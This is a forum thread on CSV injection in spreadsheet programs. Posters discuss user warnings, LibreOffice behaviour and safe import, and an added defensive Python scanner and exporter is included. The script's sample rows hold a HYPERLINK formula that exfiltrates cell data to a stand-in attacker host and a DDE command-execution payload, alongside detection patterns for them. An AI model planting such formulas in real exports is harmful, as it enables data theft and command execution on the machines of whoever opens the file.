• .CSV files are more dangerous than you may realize


    #136440

    From The Absurdly Underestimated Dangers of CSV Injection:

    ‘So whose fault is all of this anyways?

    Well it’s not the CSV format’s. The format itself couldn’t be more clear that automatically executing anything that “looks like a formula” is not an intended usage. The bug therefore lies in popular Spreadsheet programs for doing the exact wrong thing. Of course Google Sheets must maintain feature parity with Excel, and Excel must support millions of complex spreadsheets already in existence. Also – I’m not going to research this but – even odds that Excel behavior came from something ancient like Lotus 1-2-3. Getting all spreadsheet programs to change this behavior at this point is a pretty big mountain to conquer. I suppose that it’s everyone else that must change.’

    • #162804

      Can malicious CSV files be detected by scanning them with a malware scanner? If not, how do we ensure CSV files are safe to open?

      Reminds me of the May 2017 reports about how malware can be hidden within subtitle files.

      • #162845

        You could try to upload a .csv to VirusTotal, although I’m not sure offhand if any of the scanners there check for this type of issue. You could open a .csv with a text editor such as notepad (built into Windows) or notepad++ to see if there’s anything that looks like a formula in the file.

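      The two practical questions in this thread are how a CSV producer stops "everyone else must change" from being an empty phrase, and how a recipient can check a file before a spreadsheet gets to evaluate it. The script below is an added example for this thread, not code from the linked article or from any spreadsheet vendor. It neutralises formula-like strings at export time using the leading-apostrophe approach from the OWASP CSV Injection guidance, and it scans an existing file the way the text-editor suggestion above does, but without missing quoted cells or a leading tab, and it separates plain in-sheet arithmetic from formulas that reach outside the sheet (DDE, network functions). The sample rows and the attacker hostname are constructed for illustration.

```python
"""CSV-injection helpers: a scanner that reports the cells a spreadsheet would
evaluate as formulas, and an exporter that neutralises them.

Added example for this thread, not code from the linked article or a vendor.
Trigger characters and the leading-apostrophe fix follow OWASP CSV Injection
guidance; the sample rows below are constructed.
"""
import csv
import io
import re

# A cell starting with one of these is evaluated as a formula when the CSV is
# opened with the default "General" column type (Excel, LibreOffice, Sheets).
FORMULA_TRIGGERS = ("=", "+", "-", "@")
# OWASP also lists a leading tab or carriage return, which slips past checks
# that only look for "=".
WHITESPACE_TRIGGERS = ("\t", "\r")

# Syntax that reaches outside the sheet: DDE ("cmd|' /C ...'!A0") and the
# Excel / Google Sheets functions that issue network requests.
_DDE_PATTERN = re.compile(r"\|.*!")
_EXTERNAL_PATTERN = re.compile(
    r"\b(HYPERLINK|WEBSERVICE|IMPORTXML|IMPORTDATA|IMPORTHTML|IMPORTFEED|"
    r"IMPORTRANGE|IMAGE)\s*\(",
    re.IGNORECASE,
)


def _is_number(cell: str) -> bool:
    """A cell such as "-5" is parsed as a number, not as a formula."""
    try:
        float(cell)
        return True
    except ValueError:
        return False


def is_formula_like(cell: str) -> bool:
    """True if a spreadsheet would try to evaluate this cell."""
    if not cell or _is_number(cell):
        return False
    return cell.startswith(FORMULA_TRIGGERS + WHITESPACE_TRIGGERS)


def classify(cell: str) -> str:
    """Severity bucket: 'dde' > 'external' > 'formula' > 'data'."""
    if not is_formula_like(cell):
        return "data"
    body = cell.lstrip("\t\r")
    if _DDE_PATTERN.search(body):
        return "dde"        # spawns a process via DDE
    if _EXTERNAL_PATTERN.search(body):
        return "external"   # network request, e.g. exfiltration via HYPERLINK
    return "formula"        # in-sheet arithmetic such as =2+2


def scan_csv(text: str):
    """Return (row, col, severity, cell) for every non-data cell, 1-based.

    csv.reader strips the CSV quoting first, so a quoted "=2+2" is still
    reported: the quotes are gone by the time a spreadsheet decides whether
    to evaluate the cell.
    """
    findings = []
    for r, row in enumerate(csv.reader(io.StringIO(text)), start=1):
        for c, cell in enumerate(row, start=1):
            severity = classify(cell)
            if severity != "data":
                findings.append((r, c, severity, cell))
    return findings


def neutralise(value):
    """Escape one field at export time.

    Only strings are touched, so a numeric -5 stays a number. A formula-like
    string gets a leading apostrophe, which spreadsheets read as "this cell is
    text". Downstream consumers of the file must expect that character.
    """
    if isinstance(value, str) and is_formula_like(value):
        return "'" + value
    return value


def to_csv(rows, neutralise_cells: bool = True) -> str:
    """Serialise rows; neutralise_cells=False is the naive export that makes
    CSV injection possible in the first place."""
    buf = io.StringIO()
    writer = csv.writer(buf, quoting=csv.QUOTE_ALL, lineterminator="\n")
    for row in rows:
        writer.writerow([neutralise(v) for v in row] if neutralise_cells else row)
    return buf.getvalue()


# Constructed sample: an export of user-supplied display names.
UNTRUSTED_ROWS = [
    ["id", "display_name", "balance"],
    [1, "Alice", -5],
    [2, "=2+2", 10],
    [3, '=HYPERLINK("http://attacker.example/?x="&A2,"ok")', 3],
    [4, "=cmd|' /C calc'!A0", 0],
    [5, "\t=1+1", 2],
]

if __name__ == "__main__":
    for finding in scan_csv(to_csv(UNTRUSTED_ROWS, neutralise_cells=False)):
        print("naive export: row %d col %d %-8s %r" % finding)
    print("safe export findings:", scan_csv(to_csv(UNTRUSTED_ROWS)))
    print(to_csv(UNTRUSTED_ROWS))
```

      Run as a script it lists four findings in the naive export (one plain formula, one HYPERLINK exfiltration, one DDE command, one tab-prefixed formula) and none in the neutralised export. Note that quoting alone, as `csv.QUOTE_ALL` does, is not a defence: the reader strips the quotes before the spreadsheet sees the cell, which is why the apostrophe prefix is needed. A number such as the `-5` balance is left alone because spreadsheets parse it as a number; the prefix is only applied to strings.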
        • #163079

          Mr Brian said:
          You could open a .csv with a text editor such as notepad (built into Windows) or notepad++ to see if there’s anything that looks like a formula in the file.

          I see … thanks for the advice! I assume viewing CSV files in the preview pane of Windows Explorer (or any file manager) should be safe as well?

          How about opening CSV files (including those containing formulae) in a rich-text editor like WordPad, or in a dedicated CSV editor/viewer?

          • #163092

            I think all of those should be ok, since they hopefully don’t evaluate formulas.

      • #162851

        I tried to open the first .csv mentioned at the link in the first post. Excel 2016 warns the user.

    • #162922

      Tried both of the exploits (with the second one pointed to a pastebin I created, as the author suggested), and neither one worked in LibreOffice 5.3.6.1 (Win 8.1) with default settings.  Score one for the free guys.

      While the .csv spec is supposed to disallow parsing any content as anything other than data, I still see a difference between having formulae that calculate things from other cells and those that reach out and execute shell commands or issue HTTP requests.  The latter should definitely not work by default (as in “not work at all,” not “ask the user what to do.”)

      As the author of the original piece notes, the problem (if the spreadsheet indeed parses formulae from CSV) is that warning messages have no effect on regular, non-techie users.  “Warning!  An unknown, possibly dangerous program is trying to access the internet.  Select Allow to permit only if you trust this program, or Block if you do not recognize it,” to a standard non-techie user, translates to “Something mysterious happened, and now you have to click Allow to make things start working again.”  Firewall, HIPS, or antimalware programs that default to prompting are in effect “allow all,” as are User Access Control prompts.

      Attempts to train regular users about these things have typically met with disappointing results.  Anecdotes about users being given training on how to respond to prompts, phishing attempts, and other things that require thinking before acting abound… I remember one supposedly true story where the IT guys sent around a sample phishing email with a title like “Remember, this is what phishing emails will look like.  NEVER RESPOND TO THEM,” containing a simulated phishing attempt asking the user for their password and username, resulting in multiple users replying to the message that says in its title not to respond, cheerfully giving their username and password, less than ten minutes after completing training in what not to do when phished.

      It is… not encouraging.  Many computer users don’t understand anything about what they’re doing, and they don’t want to understand.  It’s almost a point of pride in refusing to move beyond their lack of knowledge.  They fight to remain unsavvy and naive.  Any solution that relies on the user using his head, unfortunately, cannot be trusted.

      Things like this should default to not allowing the exploit, even at the risk of frustrating some people who think that violating the very specification of .csv is a good idea if it makes things (that are risky) “just work.”  Some things should not “just work,” but as long as the manufacturer that makes nearly all of the spreadsheets gives it the green light, people will continue to consider it normal and act with the expectation that it will work.  If Excel blocked it by default, it would not take long before the abuse of .csv came to a grinding halt.

      Dell XPS 13/9310, i5-1135G7/16GB, KDE Neon 6.2
      XPG Xenia 15, i7-9750H/32GB & GTX1660ti, Kubuntu 24.04
      Acer Swift Go 14, i5-1335U/16GB, Kubuntu 24.04 (and Win 11)

      • #163033

        Dunning/Kruger, unknown-unknowns, and other effects

        I often wonder how high or how far down on the scale I actually am. And I will never know-know. That’s kind of the point. And any ‘neutral objective’ observer is limited by their own versions of the above, because they are unable to truly see as I see. Einstein’s relativity extends beyond physics too.

        I will acknowledge pressing ‘y’ once too often from time to time. But that ‘red X to accept’ never got me. I figure I’m 55th percentile or better.

    • #163004

      We’ll probably never know who thought such behavior was okay, but they probably thought speeding things up was a great idea. And that must be some awfully written parser code to naturally execute external programs! Microsoft, Google and any other creators of spreadsheet programs have the responsibility to fix their code to not execute anything when importing CSV files.

    • #163132

      .CSV files with some formulas don’t cause Excel 2016 to warn the user upon opening. Example: “=2+2”, which Excel evaluates to 4.

    • #163187

      From https://www.reddit.com/r/programming/comments/75cupe/the_absurdly_underestimated_dangers_of_csv/do5pd9w/: ‘As an FYI, a really easy way to mitigate this in Excel is to import data into a blank sheet rather than directly opening the csv and marking the datatype for each column as text during the import wizard. The issue is that by default Excel (and other spreadsheet programs) formats each column as “general” which will evaluate anything that looks like a formula as a formula.’

      (Screenshot: Text Import Wizard)
